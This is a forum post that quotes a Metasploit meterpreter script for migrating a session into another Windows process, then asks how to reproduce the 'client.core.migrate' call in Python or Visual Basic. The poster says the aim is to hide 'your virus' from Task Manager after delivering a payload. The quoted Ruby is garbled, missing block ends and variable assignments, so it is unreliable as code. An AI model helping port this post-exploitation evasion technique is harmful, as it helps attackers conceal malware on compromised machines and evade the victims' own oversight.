Forum Thread: Meterpreter Migrate Help Pls

# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.

# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.

spawn = false
kill = false
target_pid = nil
target_name = nil

opts =
"-h" => false, "Help menu." ,
"-f" => false, "Launch a process and migrate into the new process",
"-p" => true , "PID to migrate to.",
"-k" => false, "Kill original process.",
"-n" => true, "Migrate into the first process with this executable name (explorer.exe)"

opts.parse(args) { |opt, idx, val|
case opt
when "-f"
spawn = true
when "-k"
kill = true
when "-p"
target_pid = val.to_i
when "-n"
target_name = val.to_s
when "-h"
raise Rex::Script::Completed
raise Rex::Script::Completed

# Creates a temp notepad.exe to migrate to, depending on the architecture.
def create_temp_proc()
# Use the system path for executable to run
cmd = "notepad.exe"
# run hidden
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })

# In case no option is provided show help
if args.length == 0
raise Rex::Script::Completed

### Main ###

if client.platform == 'windows'
server =
original_pid =
print_status("Current server process: #{} (#{})")

if spawn
print_status("Spawning notepad.exe process to migrate to")
target_pid = create_temp_proc

if target_name and not target_pid
target_pid = client.sys.process[target_name]
if not target_pid
print_status("Could not identify the process ID for #{target_name}")
raise Rex::Script::Completed

print_good("Migrating to #{target_pid}")
print_good("Successfully migrated to process #{}")
rescue ::Exception => e
print_error("Could not migrate in to process.")

if kill
print_status("Killing original process with PID #{original_pid}")
print_good("Successfully killed process with PID #{original_pid}")

— Metasploit

Language = RUBY

Friends, the code you see above is taken from Metasploit on Linux. Most Metasploit users know that when you take a payload to the other side and listen to it, you can hide your virus from places like Task Manager with the "migrate" command, or you can show it as another program.

I've studied this code, and it's actually easy code with 96 lines. Of all the 96 lines of code, only 1 line does the actual job.


In the above code there is a variable named "target_pid", and this is the "PID" value of the program we want to hide. So far I have no problem with the main responsibility of how to do this in Visual Basic or Python. What actually is client.core.migrate? How do I use it in Python or Visual Basic?

Sorry, my English may be bad.
